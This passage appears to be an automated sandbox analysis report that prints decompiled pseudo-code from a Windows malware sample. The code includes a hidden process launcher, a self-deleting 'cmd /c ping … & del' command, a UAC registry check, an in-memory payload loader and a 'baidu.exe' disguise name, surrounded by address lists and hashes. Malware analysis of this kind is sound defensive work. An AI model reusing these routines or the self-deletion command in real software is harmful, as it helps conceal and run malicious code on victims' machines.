                                                                                                                                                      0x1002071b
                                                                                                                                                      0x1002072b
                                                                                                                                                      0x10020731
                                                                                                                                                      0x10020739
                                                                                                                                                      0x1002073e
                                                                                                                                                      0x1002074e
                                                                                                                                                      0x10020754
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x100206a1
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x100206b8
                                                                                                                                                      0x100206bf
                                                                                                                                                      0x100206c4
                                                                                                                                                      0x100206c7
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206cb
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x1002075c
                                                                                                                                                      0x10020761
                                                                                                                                                      0x1002076b
                                                                                                                                                      0x10020775
                                                                                                                                                      0x1002077a
                                                                                                                                                      0x10020783
                                                                                                                                                      0x1002078e

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(C:\hijack), ref: 10020692
                                                                                                                                                        • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DefaultExistsFilePathSystem
                                                                                                                                                      • String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                      • API String ID: 482051434-1656717437
                                                                                                                                                      • Opcode ID: 3ed2b26a57a2e0ec3b3ffba1c8676fbab2e5e79ae8907fbc825caa914dadcd8d
                                                                                                                                                      • Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
                                                                                                                                                      • Opcode Fuzzy Hash: 3ed2b26a57a2e0ec3b3ffba1c8676fbab2e5e79ae8907fbc825caa914dadcd8d
                                                                                                                                                      • Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2) {
					L7:
					_t38 = E1001D7E0(_t68,  &_v548); // executed
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t52 = E1001D240(); // executed
					if(_t52 == 0) {
						goto L7;
					}
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}
























                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc0d
                                                                                                                                                      0x1001ddb4
                                                                                                                                                      0x1001ddb4
                                                                                                                                                      0x1001dc13
                                                                                                                                                      0x1001dc28
                                                                                                                                                      0x1001dc30
                                                                                                                                                      0x1001dc3e
                                                                                                                                                      0x1001dc45
                                                                                                                                                      0x1001dc54
                                                                                                                                                      0x1001dc5b
                                                                                                                                                      0x1001dc60
                                                                                                                                                      0x1001dc63
                                                                                                                                                      0x1001dc74
                                                                                                                                                      0x1001dc81
                                                                                                                                                      0x1001dcd2
                                                                                                                                                      0x1001dcd9
                                                                                                                                                      0x1001dcde
                                                                                                                                                      0x1001dce1
                                                                                                                                                      0x1001dce3
                                                                                                                                                      0x1001dd1e
                                                                                                                                                      0x1001dd25
                                                                                                                                                      0x1001dd39
                                                                                                                                                      0x1001dd40
                                                                                                                                                      0x1001dd45
                                                                                                                                                      0x1001dd48
                                                                                                                                                      0x1001dd4a
                                                                                                                                                      0x1001dd5f
                                                                                                                                                      0x1001dd5f
                                                                                                                                                      0x1001dd6d
                                                                                                                                                      0x1001dd72
                                                                                                                                                      0x1001dd72
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dd4a
                                                                                                                                                      0x1001dcec
                                                                                                                                                      0x1001dcf1
                                                                                                                                                      0x1001dcf4
                                                                                                                                                      0x1001dcf6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dcf8
                                                                                                                                                      0x1001dcff
                                                                                                                                                      0x1001dd04
                                                                                                                                                      0x1001dd07
                                                                                                                                                      0x1001dd09
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dd0b
                                                                                                                                                      0x1001dd12
                                                                                                                                                      0x1001dd17
                                                                                                                                                      0x1001dd1a
                                                                                                                                                      0x1001dd1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dc8c
                                                                                                                                                      0x1001dc8c
                                                                                                                                                      0x1001dc93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dc9c
                                                                                                                                                      0x1001dca1
                                                                                                                                                      0x1001dca4
                                                                                                                                                      0x1001dca6
                                                                                                                                                      0x1001dca8
                                                                                                                                                      0x1001dcaf
                                                                                                                                                      0x1001dcc5
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dd75
                                                                                                                                                      0x1001dd7e
                                                                                                                                                      0x1001dd80
                                                                                                                                                      0x1001dd91
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ddae

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                      • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                        • Part of subcall function 1001D240: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                        • Part of subcall function 1001D240: RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                        • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                        • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                        • Part of subcall function 1001DA70: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                        • Part of subcall function 1001DA70: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                        • Part of subcall function 1001DA70: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                        • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                      • String ID: Mid2Failed
                                                                                                                                                      • API String ID: 3782552391-1001836097
                                                                                                                                                      • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                      • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022AF1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                      0x1001fea0
                                                                                                                                                      0x1001fea0
                                                                                                                                                      0x1001fea3
                                                                                                                                                      0x1001fea5
                                                                                                                                                      0x1001feb0
                                                                                                                                                      0x1001feb1
                                                                                                                                                      0x1001febe
                                                                                                                                                      0x1001fec5
                                                                                                                                                      0x1001feda
                                                                                                                                                      0x1001fee2
                                                                                                                                                      0x1001fef7
                                                                                                                                                      0x1001ff03
                                                                                                                                                      0x1001ff17
                                                                                                                                                      0x1001ff25
                                                                                                                                                      0x1001ff26
                                                                                                                                                      0x1001ff33
                                                                                                                                                      0x1001ff47
                                                                                                                                                      0x1001ff56
                                                                                                                                                      0x1001ff61
                                                                                                                                                      0x1001ff66
                                                                                                                                                      0x1001ff70
                                                                                                                                                      0x1001ff78
                                                                                                                                                      0x1001ff82

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s %s %s$0011
                                                                                                                                                      • API String ID: 3552933064-2132516514
                                                                                                                                                      • Opcode ID: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction ID: 6384a0b866657e4047376afeeb64c65eb3b3c0e3c567da3335d1d9c995957fc0
                                                                                                                                                      • Opcode Fuzzy Hash: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction Fuzzy Hash: 7911B6B6C00248ABE714EB90DC96FDD7778EB04750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				int _t18;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
				if(_t18 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}








                                                                                                                                                      0x1001a1d6
                                                                                                                                                      0x1001a1e5
                                                                                                                                                      0x1001a1ed
                                                                                                                                                      0x1001a1f4
                                                                                                                                                      0x1001a1fb
                                                                                                                                                      0x1001a209
                                                                                                                                                      0x1001a22b
                                                                                                                                                      0x1001a233
                                                                                                                                                      0x1001a239
                                                                                                                                                      0x1001a243
                                                                                                                                                      0x1001a249
                                                                                                                                                      0x1001a249
                                                                                                                                                      0x1001a256

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 1151464618-2746444292
                                                                                                                                                      • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                      • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                      0x1001a269
                                                                                                                                                      0x1001a27e
                                                                                                                                                      0x1001a286
                                                                                                                                                      0x1001a29b
                                                                                                                                                      0x1001a2b1
                                                                                                                                                      0x1001a2ca
                                                                                                                                                      0x1001a2db
                                                                                                                                                      0x1001a2e4

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                      • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                      • API String ID: 2874319085-10483710
                                                                                                                                                      • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                      • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00404C40, Relevance: 9.1, APIs: 6, Instructions: 112filememoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00404C40() {
				intOrPtr _t75;
				void* _t99;

				 *((intOrPtr*)(_t99 - 0x28))(0, _t99 - 0x138);
				 *(_t99 - 0x1a0) = CreateFileA(_t99 - 0x138, 0x80000000, 3, 0, 3, 0x80, 0);
				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
				 *(_t99 - 0x30) =  *((intOrPtr*)(_t99 - 0x1d8))( *(_t99 - 0x1a0), 0);
				 *(_t99 - 0x188) = VirtualAlloc(0,  *(_t99 - 0x30), 0x3000, 4);
				E00405369( *(_t99 - 0x30),  *(_t99 - 0x188), 0,  *(_t99 - 0x30));
				ReadFile( *(_t99 - 0x1a0),  *(_t99 - 0x188),  *(_t99 - 0x30), _t99 - 0x1f4, 0);
				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
				FindCloseChangeNotification( *(_t99 - 0x1a0));
				E004053A9(_t99 - 0x184,  *(_t99 - 0x188) + 0x45, 4);
				 *(_t99 - 0x19c) =  *(_t99 - 0x30) -  *((intOrPtr*)(_t99 - 0x184));
				 *((intOrPtr*)(_t99 - 0x1f0)) = VirtualAlloc(0,  *(_t99 - 0x19c), 0x3000, 0x40);
				E004053A9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x188) +  *((intOrPtr*)(_t99 - 0x184)),  *(_t99 - 0x19c));
				E00405529( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178, 0xa);
				 *((intOrPtr*)(_t99 - 0x1ac)) = E00405569( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178);
				_t75 = E004050D9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x19c), _t99 - 0x178,  *((intOrPtr*)(_t99 - 0x1ac)),  *((intOrPtr*)(_t99 - 0x1dc)),  *((intOrPtr*)(_t99 - 0x180)),  *((intOrPtr*)(_t99 - 0x2c)),  *((intOrPtr*)(_t99 - 0x148))); // executed
				 *((intOrPtr*)(_t99 - 0x1b0)) = _t75;
				return  *((intOrPtr*)(_t99 - 0x1a4))(0);
			}





                                                                                                                                                      0x00404c49
                                                                                                                                                      0x00404c6b
                                                                                                                                                      0x00404c77
                                                                                                                                                      0x00404c8c
                                                                                                                                                      0x00404c9f
                                                                                                                                                      0x00404cb2
                                                                                                                                                      0x00404cd5
                                                                                                                                                      0x00404ce1
                                                                                                                                                      0x00404cee
                                                                                                                                                      0x00404d04
                                                                                                                                                      0x00404d15
                                                                                                                                                      0x00404d2e
                                                                                                                                                      0x00404d4f
                                                                                                                                                      0x00404d67
                                                                                                                                                      0x00404d7e
                                                                                                                                                      0x00404db9
                                                                                                                                                      0x00404dbe
                                                                                                                                                      0x00404dcf

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00404C65
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00404C9C
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00404CD5
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00404CEE
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00404D2B
                                                                                                                                                      • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00404DC6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4217122820-0
                                                                                                                                                      • Opcode ID: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
                                                                                                                                                      • Instruction ID: 286b678a649b461aa87654d1fb9e4a3dc2712c27ebad769fdf01e4c5803113b1
                                                                                                                                                      • Opcode Fuzzy Hash: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
                                                                                                                                                      • Instruction Fuzzy Hash: 1941B9B1E40228AFEB64DBA4CC55FEEB779AB49700F0081D9F60DB6280DA755E80CF55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);
					E10001A90( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                      0x1001a600
                                                                                                                                                      0x1001a600
                                                                                                                                                      0x1001a603
                                                                                                                                                      0x1001a605
